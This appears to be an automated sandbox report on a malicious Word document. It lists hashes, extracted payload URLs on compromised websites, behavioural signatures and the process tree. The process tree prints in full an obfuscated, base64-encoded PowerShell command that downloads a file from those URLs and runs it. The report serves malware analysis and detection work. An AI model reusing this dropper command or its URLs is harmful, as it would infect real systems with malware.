Analysis
-
max time kernel
147s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220112 -
submitted
01-02-2022 05:33
Static task
static1
Behavioral task
behavioral1
Sample
7b556613e2f814670e721619781c1327dc6982655beef492a03e8b5449b7782b.doc
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
7b556613e2f814670e721619781c1327dc6982655beef492a03e8b5449b7782b.doc
Resource
win10v2004-en-20220112
General
-
Target
7b556613e2f814670e721619781c1327dc6982655beef492a03e8b5449b7782b.doc
-
Size
180KB
-
MD5
bf448dd849e38068072e7f242e59a387
-
SHA1
e70fca9132fd8b82a6409c2cb40b34062634f5e2
-
SHA256
7b556613e2f814670e721619781c1327dc6982655beef492a03e8b5449b7782b
-
SHA512
08091b6ee72fb42effb51f72be934dd8f4ca7e01f8c54ef4af12f6437ccfe8a006407d93e4c7240f9dda3bf1a0cda2349329bf2739c89b5bcc6f0575d2482a96
Malware Config
Extracted
http://animzzz.net/wp-content/I_0f/
http://apnaoasis.com/wp-content/Y3_iT/
http://acsboda.com/wp-includes/yn_gp/
http://congchung.isocial.vn/img/6S_yF/
http://www.axasta.com/wp-content/T8_Fp/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1796 3744 powershell.exe -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 55 1796 powershell.exe 56 1796 powershell.exe -
Sets service image path in registry 2 TTPs
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Modifies data under HKEY_USERS 41 IoCs
Processes:
WaaSMedicAgent.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 1216 WINWORD.EXE 1216 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1796 powershell.exe 1796 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1796 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 1216 WINWORD.EXE 1216 WINWORD.EXE 1216 WINWORD.EXE 1216 WINWORD.EXE 1216 WINWORD.EXE 1216 WINWORD.EXE 1216 WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7b556613e2f814670e721619781c1327dc6982655beef492a03e8b5449b7782b.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1216
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p1⤵PID:3220
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e JABoAFoAXwBjAEEAQQA9ACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiACAALQBmACAAJwBIAEEAVQAnACwAJwBCADEAJwAsACcAQQBBAEEAJwApADsAJABqAFgAQQBDAFEAVQBfACAAPQAgACcAMQAwADMAJwA7ACQAVwA0AEEAQQBjAEEAPQAoACIAewAxAH0AewAyAH0AewAwAH0AIgAgAC0AZgAgACcANAAnACwAJwBuACcALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnADQAQgAnACwAJwBvAEEAVQAnACkAKQA7ACQAZgBaAFUAQQBBAGsAQQBaAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABqAFgAQQBDAFEAVQBfACsAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwAuAGUAeAAnACwAJwBlACcAKQA7ACQARwBRAFUAQgBrAFgAMQA9ACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiACAALQBmACAAJwBHACcALAAnAEQAJwAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACcAQQBBAFoAJwAsACcARwBBACcAKQApADsAJABvAFoAQQBBAHgAQgBBAFUAPQAuACgAJwBuAGUAdwAnACsAJwAtAG8AJwArACcAYgBqAGUAYwB0ACcAKQAgAE4AYABlAFQALgBgAFcARQBCAEMATABpAEUAYABOAHQAOwAkAGYAeAB3AFoAQQBVAEEAYwA9ACgAIgB7ADIANQB9AHsAMQB9AHsAOAB9AHsANAAzAH0AewAxADgAfQB7ADMAOQB9AHsAOQB9AHsAMwB9AHsAMQA5AH0AewAyADQAfQB7ADIAMAB9AHsAMAB9AHsAMwAzAH0AewAxADUAfQB7ADUAfQB7ADQANwB9AHsANAA4AH0AewA0ADEAfQB7ADEANwB9AHsAMQAxAH0AewAyADMAfQB7ADIAMgB9AHsAMQA2AH0AewA3AH0AewA2AH0AewAyADEAfQB7ADMAMgB9AHsAMQAyAH0AewAyADYAfQB7ADQANAB9AHsAMQAzAH0AewAzADgAfQB7ADIANwB9AHsAMgA4AH0AewA1ADAAfQB7ADMANgB9AHsANAAyAH0AewAzADQAfQB7ADQANgB9AHsAMgB9AHsANAAwAH0AewAxADQAfQB7ADQAOQB9AHsANAA1AH0AewAzADEAfQB7ADEAMAB9AHsAMgA5AH0AewAzADcAfQB7ADMAMAB9AHsANAB9AHsAMwA1AH0AIgAtAGYAIAAoACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwB0AHQAcAA6ACcALAAnAEAAaAAnACkALAAnADAAJwAsACcAZgAvACcAKQAsACcAYQAnACwAKAAiAHsAMgB9AHsAMAB9AHsAMQB9ACIALQBmACAAJwBzAG8AYwAnACwAJwBpAGEAJwAsACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiACAALQBmACAAJwB1ACcALAAnAG4AZwAuAGkAJwAsACcAYwBoACcAKQApACwAJwBwACcALAAnAGUAbgAnACwAJwBvAGEAJwAsACcALwAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAZQBuAHQAJwAsACcAdAAnACkALAAnAG4AJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAdAAvAHcAJwAsACcAZQAnACkALAAnAC4AbgAnACkALAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBjAG8AJwAsACcAYQAuACcAKQAsACcAdwBwACcALAAnAHQAJwAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcALwAvAGEAJwAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACcAYwBzAGIAJwAsACcAbwAnACkAKQAsACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiACAALQBmACAAKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwBAAGgAdAAnACwAJwBGAC8AJwAsACcAUwBfAHkAJwApACwAJwAvACcALAAnADYAJwApACwAJwBwAG4AYQAnACwAJwBuACcALAAnAG0ALwAnACwAJwB6ACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwB0ACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAC0AYwBvACcALAAnAG4AJwApACkALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcALwBJAF8AJwAsACcAdAAnACkALAAnAFkAJwAsACcAYwBvACcALAAnAC0AJwAsACcAZQBuACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwAvACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAdAB0AHAAOgAvACcALAAnAGgAJwApACkALAAnAHAAJwAsACcAYwAnACwAJwBsACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBtAC8AdwAnACwAJwBwAC0AYwAnACkALAAnAG4AdAAnACwAJwB0ACcALAAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAgACcAdAAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAQABoACcALAAnAFQALwAnACkALAAnADMAXwBpACcAKQAsACcALwAvAGEAJwAsACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiAC0AZgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAIAAnAGgAdAAnACwAJwBwAC8AQAAnACwAJwBnACcAKQAsACcAOgAnACwAJwB0AHAAJwApACwAKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIAIAAtAGYAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcALwBUADgAXwAnACwAJwB0ACcAKQAsACcAcAAvACcALAAnAEYAJwApACwAKAAiAHsAMQB9AHsAMAB9AHsAMgB9ACIAIAAtAGYAIAAnAGUAcwAvACcALAAnAGQAJwAsACcAeQBuACcAKQAsACcAbwAnACwAKAAiAHsAMwB9AHsAMgB9AHsAMQB9AHsAMAB9ACIAIAAtAGYAKAAiAHsAMAB9AHsAMQB9ACIALQBmACcAdwBwAC0AaQAnACwAJwBuACcAKQAsACcAbQAvACcALAAnAGMAbwAnACwAJwBkAGEALgAnACkALAAnAHoAegAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAGwALgAnACwAKAAiAHsAMgB9AHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAG4ALwAnACwAJwBpAG0AZwAnACwAJwB2ACcAKQApACwAJwBjAG8AJwAsACcAXwAnACwAJwBpAG0AJwAsACcAOgAnACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACcAYQB4ACcALAAnAGEAcwAnACkALAAoACIAewAwAH0AewAxAH0AIgAtAGYAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBvAG4AJwAsACcALwAvAGMAJwApACwAJwBnACcAKQAsACcAcwAnACwAJwBpAHMALgAnACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAdABwADoALwAvACcALAAnAHcAdwAnACkALAAnAHcALgAnACkALAAnAHUAJwApAC4AIgBzAFAATABgAEkAdAAiACgAJwBAACcAKQA7ACQAVQBVAHcAWgBRADEAQQA9ACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBCACcALAAnAGMAQQB3ACcAKQAsACcAQgBfACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAGYAQQBCAGsAMQBBAEEANAAgAGkAbgAgACQAZgB4AHcAWgBBAFUAQQBjACkAewB0AHIAeQB7ACQAbwBaAEEAQQB4AEIAQQBVAC4AIgBkAE8AVwBuAGAATABgAG8AYQBEAGAARgBpAGwARQAiACgAJABmAEEAQgBrADEAQQBBADQALAAgACQAZgBaAFUAQQBBAGsAQQBaACkAOwAkAGMAQwBfAEEAVQBDAD0AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACAAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBDAEEAQQAnACwAJwBBACcAKQAsACcAWgAnACwAJwBQAFEAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAGYAWgBVAEEAQQBrAEEAWgApAC4AIgBsAGUAYABOAGAARwBUAEgAIgAgAC0AZwBlACAAMgAwADIAOAAxACkAIAB7AC4AKAAnAEkAbgB2AG8AawBlAC0ASQAnACsAJwB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAGYAWgBVAEEAQQBrAEEAWgA7ACQAVQBBAEEAYwBEAHcAPQAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAQQBRACcALAAoACIAewAwAH0AewAyAH0AewAxAH0AIgAtAGYAJwBuACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBVACcALAAnAEEAVQBfACcAKQAsACcAQQAnACkAKQA7AGIAcgBlAGEAawA7ACQAagBYAGMAXwBBAGsAPQAoACIAewAyAH0AewAwAH0AewAxAH0AIgAgAC0AZgAgACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBBAEQAJwAsACcAVQBBACcAKQAsACcAdwBjACcALAAnAEgAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABCAFoAQgBCAEEAVQA9ACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcARABBAEMAJwAsACcAQQAnACkALAAnAFoAYwAnACkA1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1796
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe e1ecf71040ef45d03f1ea720a121e96e NZEgRxQceUqaoGTnPodVoA.0.1.0.0.01⤵
- Modifies data under HKEY_USERS
PID:1656